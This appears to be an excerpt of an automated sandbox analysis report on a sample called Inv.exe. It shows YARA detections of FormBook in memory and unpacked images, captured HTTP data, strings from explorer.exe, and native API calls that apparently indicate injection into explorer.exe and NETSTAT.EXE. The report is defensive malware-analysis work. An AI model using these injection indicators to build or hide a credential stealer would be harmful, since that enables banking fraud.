0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52 Data Ascii: 457d<!DOCTYPE html><html lang="en-US" ><he
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000002.1048019987.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Inv.exe, 00000000.00000002.673645409.0000000000A58000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041A060 NtClose,1_2_0041A060
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041A110 NtAllocateVirtualMemory,1_2_0041A110
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419F30 NtCreateFile,1_2_00419F30
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419FE0 NtReadFile,1_2_00419FE0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041A08A NtAllocateVirtualMemory,1_2_0041A08A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419FDA NtReadFile,1_2_00419FDA
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00419FDC NtReadFile,1_2_00419FDC
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019899A0 NtCreateSection,LdrInitializeThunk,1_2_019899A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01989910
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019898F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_019898F0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989840 NtDelayExecution,LdrInitializeThunk,1_2_01989840
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01989860
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01989A00
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A20 NtResumeThread,LdrInitializeThunk,1_2_01989A20
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A50 NtCreateFile,LdrInitializeThunk,1_2_01989A50
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019895D0 NtClose,LdrInitializeThunk,1_2_019895D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989540 NtReadFile,LdrInitializeThunk,1_2_01989540
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989780 NtMapViewOfSection,LdrInitializeThunk,1_2_01989780
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019897A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_019897A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989710 NtQueryInformationToken,LdrInitializeThunk,1_2_01989710
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019896E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_019896E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01989660
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019899D0 NtCreateProcessEx,1_2_019899D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989950 NtQueueApcThread,1_2_01989950
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019898A0 NtWriteVirtualMemory,1_2_019898A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989820 NtEnumerateKey,1_2_01989820
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198B040 NtSuspendThread,1_2_0198B040
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198A3B0 NtGetContextThread,1_2_0198A3B0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989B00 NtSetValueKey,1_2_01989B00
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A80 NtOpenDirectoryObject,1_2_01989A80
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989A10 NtQuerySection,1_2_01989A10
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019895F0 NtQueryInformationFile,1_2_019895F0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198AD30 NtSetContextThread,1_2_0198AD30
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989520 NtWaitForSingleObject,1_2_01989520
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989560 NtWriteFile,1_2_01989560
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989FE0 NtCreateMutant,1_2_01989FE0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198A710 NtOpenProcessToken,1_2_0198A710
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989730 NtQueryVirtualMemory,1_2_01989730
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989770 NtSetInformationFile,1_2_01989770
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198A770 NtOpenThread,1_2_0198A770
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989760 NtOpenProcess,1_2_01989760
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019896D0 NtCreateKey,1_2_019896D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01989610 NtEnumerateValueKey,1_2_01989610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A50 NtCreateFile,LdrInitializeThunk,4_2_02E59A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59860 NtQuerySystemInformation,LdrInitializeThunk,4_2_02E59860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59840 NtDelayExecution,LdrInitializeThunk,4_2_02E59840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E599A0 NtCreateSection,LdrInitializeThunk,4_2_02E599A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_02E59910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E596E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02E596E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E596D0 NtCreateKey,LdrInitializeThunk,4_2_02E596D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_02E59660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59650 NtQueryValueKey,LdrInitializeThunk,4_2_02E59650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59FE0 NtCreateMutant,LdrInitializeThunk,4_2_02E59FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59780 NtMapViewOfSection,LdrInitializeThunk,4_2_02E59780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59710 NtQueryInformationToken,LdrInitializeThunk,4_2_02E59710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E595D0 NtClose,LdrInitializeThunk,4_2_02E595D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59540 NtReadFile,LdrInitializeThunk,4_2_02E59540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A80 NtOpenDirectoryObject,4_2_02E59A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A20 NtResumeThread,4_2_02E59A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A00 NtProtectVirtualMemory,4_2_02E59A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59A10 NtQuerySection,4_2_02E59A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5A3B0 NtGetContextThread,4_2_02E5A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59B00 NtSetValueKey,4_2_02E59B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E598F0 NtReadVirtualMemory,4_2_02E598F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E598A0 NtWriteVirtualMemory,4_2_02E598A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5B040 NtSuspendThread,4_2_02E5B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59820 NtEnumerateKey,4_2_02E59820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E599D0 NtCreateProcessEx,4_2_02E599D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59950 NtQueueApcThread,4_2_02E59950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59670 NtQueryInformationProcess,4_2_02E59670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59610 NtEnumerateValueKey,4_2_02E59610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E597A0 NtUnmapViewOfSection,4_2_02E597A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59760 NtOpenProcess,4_2_02E59760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5A770 NtOpenThread,4_2_02E5A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59770 NtSetInformationFile,4_2_02E59770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59730 NtQueryVirtualMemory,4_2_02E59730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5A710 NtOpenProcessToken,4_2_02E5A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E595F0 NtQueryInformationFile,4_2_02E595F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59560 NtWriteFile,4_2_02E59560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E59520 NtWaitForSingleObject,4_2_02E59520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5AD30 NtSetContextThread,4_2_02E5AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036A060 NtClose,4_2_0036A060
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036A110 NtAllocateVirtualMemory,4_2_0036A110
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369F30 NtCreateFile,4_2_00369F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369FE0 NtReadFile,4_2_00369FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036A08A NtAllocateVirtualMemory,4_2_0036A08A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369FDC NtReadFile,4_2_00369FDC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00369FDA NtReadFile,4_2_00369FDA
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0123D9290_2_0123D929
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012451BC0_2_012451BC
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012479910_2_01247991
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012455E00_2_012455E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012404320_2_01240432
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0124683C0_2_0124683C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012460C00_2_012460C0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01245B500_2_01245B50
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0040102F1_2_0040102F
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D1EF1_2_0041D1EF
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041E18E1_2_0041E18E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041DAA31_2_0041DAA3
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00409E3C1_2_00409E3C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D6FE1_2_0041D6FE
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0123D9291_2_0123D929
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0123A9511_2_0123A951
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012451BC1_2_012451BC
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012479911_2_01247991
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0124683C1_2_0124683C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012460C01_2_012460C0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01245B501_2_01245B50
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012455E01_2_012455E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012404321_2_01240432
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194F9001_2_0194F900
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019641201_2_01964120
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195B0901_2_0195B090
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A120A81_2_01A120A8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A01_2_019720A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A010021_2_01A01002
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197EBB01_2_0197EBB0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0DBD21_2_01A0DBD2
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A12B281_2_01A12B28
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A122AE1_2_01A122AE
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019725811_2_01972581
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195D5E01_2_0195D5E0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A12D071_2_01A12D07
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01940D201_2_01940D20
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A11D551_2_01A11D55
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195841F1_2_0195841F
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A11FF11_2_01A11FF1
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A12EF71_2_01A12EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE22AE4_2_02EE22AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECFA2B4_2_02ECFA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED03DA4_2_02ED03DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDDBD24_2_02EDDBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4EBB04_2_02E4EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AB404_2_02E3AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE2B284_2_02EE2B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE28EC4_2_02EE28EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A04_2_02E420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE20A84_2_02EE20A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2B0904_2_02E2B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EEE8244_2_02EEE824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A8304_2_02E3A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED10024_2_02ED1002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E341204_2_02E34120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1F9004_2_02E1F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE2EF74_2_02EE2EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E36E304_2_02E36E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDD6164_2_02EDD616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE1FF14_2_02EE1FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EEDFCE4_2_02EEDFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDD4664_2_02EDD466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2841F4_2_02E2841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2D5E04_2_02E2D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE25DD4_2_02EE25DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E425814_2_02E42581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE1D554_2_02EE1D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E10D204_2_02E10D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE2D074_2_02EE2D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036E18E4_2_0036E18E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D1EF4_2_0036D1EF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036DAAF4_2_0036DAAF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00352D904_2_00352D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00352D874_2_00352D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00359E3C4_2_00359E3C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00359E404_2_00359E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D6FE4_2_0036D6FE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00352FB04_2_00352FB0
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 0123BFC3 appears 38 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01236EF1 appears 84 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01239160 appears 64 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01236F06 appears 36 times
